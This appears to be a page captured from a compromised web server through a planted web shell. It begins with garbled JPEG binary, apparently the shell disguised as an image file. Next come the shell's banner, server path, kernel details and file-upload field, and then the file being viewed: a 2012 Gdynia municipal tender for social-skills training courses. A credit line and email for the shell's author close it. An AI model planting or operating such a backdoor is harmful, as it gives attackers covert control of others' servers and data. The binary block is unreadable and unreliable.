JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120320/87150-N-2012.html

<p class="kh_header"><b>Gdynia: Usługa przeprowadzenia szkoleń podnoszących kompetencje społeczne beneficjentów  projektu systemowego Rodzina bliżej siebie w zakresie:
1)	gospodarowania środkami finansowymi
2)	złych kredytów;
3)	treningu ekonomicznego;
4)	sztuki codzienności czyli treningu wychodzenia z wyuczonej bezradności;
5)	planowania rodziny;
6)	wyboru partnera życiowego;
7)	wizażu.</b><br>
<b>Numer ogłoszenia: 87150 - 2012; data zamieszczenia: 20.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Grabowo 2, 81-265 Gdynia, woj. pomorskie, tel. 058 7810120, 7820124 w. 55, 38, faks 058 7820124 w. 38.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopsgdynia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Administracja samorządowa. Pomoc publiczna..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa przeprowadzenia szkoleń podnoszących kompetencje społeczne beneficjentów  projektu systemowego Rodzina bliżej siebie w zakresie:
1)	gospodarowania środkami finansowymi
2)	złych kredytów;
3)	treningu ekonomicznego;
4)	sztuki codzienności czyli treningu wychodzenia z wyuczonej bezradności;
5)	planowania rodziny;
6)	wyboru partnera życiowego;
7)	wizażu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa przeprowadzenia szkoleń podnoszących kompetencje społeczne beneficjentów projektu systemowego Rodzina bliżej siebie w zakresie: 
1)	gospodarowania środkami finansowymi;
2)	złych kredytów;
3)	treningu ekonomicznego;
4)	sztuki codzienności czyli treningu wychodzenia z wyuczonej bezradności;
5)	planowania rodziny;
6)	wyboru partnera życiowego;
7)	wizażu.
2.	Usługa realizowana będzie w miejscu wskazanym przez Zamawiającego
3.	Zakup usługi zostanie sfinansowany ze środków dotacji rozwojowej Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki udzielonej Zamawiającemu na realizację projektu Rodzina Bliżej Siebie.	
4.	Zakres usługi:
1)	W ramach usługi Wykonawca jest zobowiązany zapewnić dla każdego uczestnika materiały szkoleniowe, tj.: materiały ćwiczeniowe, wydruk prezentacji, materiały do sporządzania notatek.
2)	Wykonawca przed podpisaniem umowy będzie zobowiązany przygotować i przedłożyć Zamawiającemu do akceptacji konspekty szkoleń, prezentacje multimedialne i materiały do ćwiczeń. 
3)	Wykonawca jest zobowiązany zapewnić ubezpieczenie od następstw nieszczęśliwych wypadków dla wszystkich uczestników szkolenia przy założeniu, że każda z grup osób kierowanych na szkolenia będzie liczyła nie więcej niż 20 osób.
4)	Szkolenie powinno zakończyć się wydaniem zaświadczenia o jego ukończeniu. Wydane zaświadczenia powinny być oznakowane logiem Europejskiego Funduszu Społecznego i informacją, że projekt był współfinansowany ze środków EFS zgodnie z umową, której wzór stanowi załącznik nr 5 SIWZ.
5)	Zajęcia szkoleniowe mogą odbywać się od poniedziałku do piątku (z wyłączeniem świąt), w przedziale czasowym od 9:00 do 20:00; oraz w soboty w przedziale czasowym od 10:00 do 15:00, z zastrzeżeniem, że liczba godzin zajęć szkoleniowych dla jednej grupy w ciągu jednego dnia nie przekroczy sześciu. 
6)	Szkolenia, o których mowa w pkt 1 zostaną zorganizowane w 2012r. i 2013r. 
7)	Zamawiający przekaże Wykonawcy harmonogram danego szkolenia na minimum 10 dni przed planowaną datą rozpoczęcia tego szkolenia.
8)	Wykonawca będzie zobowiązany rozpocząć i prowadzić szkolenie zgodnie z ww. harmonogramem. W uzasadnionych przypadkach, za zgodą Zamawiającego możliwe będzie wprowadzenie zmian w harmonogramie.
9)	Zamawiający planuje, że w 2012 roku zostanie przeprowadzonych około 50 % wszystkich godzin szkoleniowych i w roku 2013 również zostanie przeprowadzonych około 50% wszystkich godzin szkoleniowych. Przy czym w zależności od bieżącego zapotrzebowania ww. ilości godzin na dany rok mogą zostać zmienione.
10)	Przewiduje się, iż największa liczba godzin szkoleniowych (około 75%) zostanie zrealizowana w miesiącach od kwietnia do lipca 2012 i od kwietnia do lipca 2013 roku.
11)	Wykonawca zobowiązany jest do prowadzenia dokumentacji szkolenia tj. list obecności, ankiety oceniającej szkolenie oraz potwierdzenia odbioru przez uczestnika materiałów szkoleniowych oraz wydania zaświadczenia o ukończeniu szkolenia. Dokumentacja ta winna być sporządzona według zaleceń Zamawiającego.
12)	Zamawiający przekaże Wykonawcy informacje i plakaty dotyczące realizacji szkolenia współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego. Informacja o tym, że szkolenie jest współfinansowane ze środków Europejskiego Funduszu Społecznego, powinna znaleźć się w miejscu odbywania zajęć. Analogicznie powinny zostać oznakowane materiały edukacyjne zgodnie ze wzorami przekazanymi przez Zamawiającego.

5.	Szczegółowe opisy poszczególnych szkoleń:
1)	Gospodarowanie środkami finansowymi - 10 grup po 20 godzin dla każdej grupy (to 4 spotkania po 5 godzin).
a)	Program szkolenia musi obejmować co najmniej następujące zagadnienia:
-	metody efektywnego planowania wydatków
-	sposoby i efekty oszczędzania
-	kategoryzacja wydatków 
-	wybór preferencji w planowaniu wydatków
-	racjonalne gospodarowanie pieniędzmi na poszczególne kategorie

2)	Złe kredyty - 10 grup  po 20 godzin dla każdej grupy (to 4 spotkania po 5 godzin) 
a)	Program szkolenia musi obejmować co najmniej następujące zagadnienia:
-	konsekwencje pożyczek i kredytów
-	wpływ życia na kredyt na jakość życia
-	pułapki kredytowe
-	jak wychodzić z długów
-	jak nie popadać w długi
-	pożyczki a zdarzenia losowe

3)	Trening ekonomiczny - w 4 osobowych grupach. Odbędzie się 40 edycji po 8 godzin dla każdej grupy (to 4 spotkania po 2 godziny).
a)	Grupy będą składały się z nie więcej niż 4 osób znajdujących się w podobnej sytuacji ekonomicznej. 
b)	Program szkolenia musi obejmować co najmniej następujące zagadnienia:
-	analiza budżetów domowych (kategorie wydatków, racjonalność, suma przychodów i wydatków w tym przychodów okresowych (zas. celowych) oraz niefinansowych (np. obiady w szkole), gra edukacyjna (zadanie) -  symulacja budżetu, prowadzący ma przy współudziale uczestników stworzyć optymalny plan budżetu - zadanie domowe : zaplanowanie optymalnego budżetu tygodniowego - własnego
-	planowanie wydatków  (analiza wzorcowego planu przygotowanego przez prowadzącego sporządzonego adekwatnie do grupy BO, wykonanie zestawienia planu wydatków z pracy domowej, praca domowa - codzienne sporządzanie pisemnego zestawienia wydatków
-	analiza wykonania pracy domowej, przeprowadzenie symulacji zdarzenia losowego
-	praca domowa - codzienne sporządzanie pisemnego zestawienia wydatków
-	podsumowanie - prowadzący ocenia każdego uczestnika w zakresie jego mocnych i słabych stron gospodarowania posiadanymi środkami

4)	Sztuka codzienności czyli trening wychodzenia z wyuczonej bezradności. Odbędą się 6 edycji po 15 godzin każda (w tym 5 spotkań po 3 godziny w ramach każdej edycji).
a)	Program szkolenia musi obejmować co najmniej następujące zagadnienia:

- jak budować własną sieć wsparcia społecznego ;
-	praca nad samooceną - jak zbudować pozytywny obraz samego siebie;
-	jak spowodować, żeby inni postrzegali nas dobrze (w tym autoprezentacja);
-	trening zarządzania emocjami (rozpoznawanie, rola, wyrażanie)
-	rola wzmocnień pozytywnych;
-	komunikacja (stawianie granic, bariery, asertywność, rozmowa, dialog, mediacja, dyskusja) 
-	ćwiczenia;

5)	Planowanie rodziny. Odbędą się 2 edycje po 30 godzina każda (w tym 6 spotkań po 5 godzin w ramach każdej edycji).
a)	Program szkolenia musi obejmować co najmniej następujące zagadnienia:
-	 psychologiczne i biologiczne aspekty związków (powody, dla których warto mieć rodzinę, po co dzieciom rodzice i wzajemnie, dlaczego człowiek nie lubi być sam)
-	świadome planowanie i przebieg ciąży,
-	kryzys w związku, komunikacja w rodzinie, 
-	uczucia / emocje / trudności związane  z posiadaniem dzieci
-	dzieci a budżet domowy
-	zabezpieczanie emocjonalne i ekonomiczne  potomstwa
-	rola kobiety i mężczyzny w związku - stereotypowe postrzeganie ról, prezentacja zasady równości szans kobiet i mężczyzn 
 

6)	Wybór partnera życiowego. Odbędą się 2 edycje po 30 godzin (w tym 6 spotkań po 5 godzin w ramach każdej z edycji).
a)	Program szkolenia musi obejmować co najmniej następujące zagadnienia:
-	psychologiczne i biologiczne aspekty związków (powody, dla których warto mieć rodzinę, po co dzieciom rodzice i wzajemnie, dlaczego człowiek nie lubi być sam)
-	etapy w związku (pociąg seksualny a zakochanie) ;
-	potrzeby i oczekiwania w relacji partnerskiej - autodiagnoza - ćwiczenia;
-	komunikacja (stawianie granic, bariery, asertywność, rozmowa, dialog, mediacja, dyskusja); 
-	zachowanie własnej tożsamości w związku i poczucia własnej wartości;
-	rola kobiety i mężczyzny w związku - stereotypy;
-	jak się kłócić (konstruktywne rozwiązywanie konfliktów);
-	praca na własnych doświadczeniach; 

7)	Wizaż estetyczny. Odbędą się 6 edycji po 20 godzin (w tym 4 spotkania po 5 godzin w ramach każdej edycji).
a)	Program szkolenia musi obejmować co najmniej następujące zagadnienia:
-	jak nas widzą, tak nas piszą - analiza uczestników warsztatu ;
-	jak spowodować, żeby inni postrzegali nas dobrze;
-	adekwatność ubioru do sytuacji;   
-	dobór kolorystki, fryzur i stylu ubierania do uczestników warsztatu - w tym usługa wizażysty oraz fryzjera lub kosmetyczki;
-	autoprezentacja;
-	wpływ naszego wyglądu na samopoczucie psychiczne i fizyczne;
-	przygotowanie wizerunku na co dzień;
-	mowa ciała, gestykulacja, adekwatne słownictwo;
-	nasze zachowanie - kluczowe składniki sukcesu;

Uwaga! 
Ze względu na specyfikę zamówienia, a w szczególności z uwagi na fakt, że nie jest znana dokładna liczba beneficjentów kwalifikujących się do udziału w szkoleniach możliwe jest, iż zostanie zmniejszona liczba edycji niektórych szkoleń lecz nie więcej niż o 25%..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6) ustawy Prawo zamówień publicznych. Zamówienia uzupełniające mogą dotyczyć wyłącznie zakresu zamówienia podstawowego i nie mogą przekraczać 50 % jego wartości</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący posiadania uprawnień do wykonywania działalności stanowiącej przedmiot niniejszego zamówienia został spełniony jeżeli Wykonawca posiada zaświadczenie o wpisie do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę  instytucji szkoleniowej</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że warunek dotyczący dysponowania osobami zdolnymi do wykonania zamówienia został spełniony, jeżeli Wykonawca wykaże, że dysponuje minimum dwiema osobami posiadającymi wykształcenie wyższe psychologiczne (tytuł magistra psychologii) lub ekonomiczne (tytuł magistra ekonomii). 
Ponadto każda z tych osób musi posiadać doświadczenie w prowadzeniu w okresie ostatnich trzech lat przed upływem terminu składania ofert szkoleń, dla minimum 50 klientów  Ośrodków Pomocy Społecznej z zakresu: gospodarowania środkami finansowymi lub/i treningu ekonomicznego lub/i treningu wychodzenia z wyuczonej bezradności lub/i planowania rodziny lub/i wyboru partnera życiowego</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Oświadczenia i dokumenty wymagane postanowieniami Rozdziału 5 SIWZ;
2)	Wykonawca powinien załączyć do oferty dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej lub aktualny statut spółki. dokumenty można złożyć w formie kopii poświadczonej z oryginałem przez wykonawcę.
3)	W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia musi być załączone pełnomocnictwo zgodnie z art. 23 ust. 2 ustawy prawo zamówień publicznych w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
4)	W przypadku gdy formularz ofertowy lub załączone do niego dokumenty są podpisane przez osobę, której umocowanie do reprezentowania Wykonawcy nie wynika z wpisu do właściwego rejestru lub ewidencji działalności gospodarczej, do oferty należy dołączyć odpowiednie pełnomocnictwo w oryginale lub kopii poświadczonej notarialnie za zgodność z oryginałem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwa jest zmiana niniejszej umowy, na uzasadniony wniosek Wykonawcy/Zamawiającego. Dokonywanie zmian jest możliwe o ile wynika to z okoliczności, których, pomimo zachowania należytej staranności, nie można było przewidzieć w chwili zawarcia umowy, i zmiany takie są niezależne od woli stron umowy lub są korzystne dla Zamawiającego, w szczególności możliwa jest zmiana personelu Wykonawcy przewidzianego do realizacji zadania, jednakże nowe osoby muszą posiadać co najmniej takie doświadczenie i kwalifikacje jak osoby dotychczasowe. 


Zamawiający przewiduje, iż na wniosek Zamawiającego lub Wykonawcy, w uzasadnionych przypadkach, jest możliwe dokonywanie zmian w poszczególnych harmonogramach szkoleń</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mopsgdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Gdyni, 81-265 Gdynia, ul. Grabowo 2, w Sekretariacie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.03.2012 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Gdyni, 81-265 Gdynia, ul. Grabowo 2, w Sekretariacie..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup usługi zostanie sfinansowany ze środków dotacji rozwojowej Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki udzielonej Zamawiającemu na realizację projektu Rodzina Bliżej Siebie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com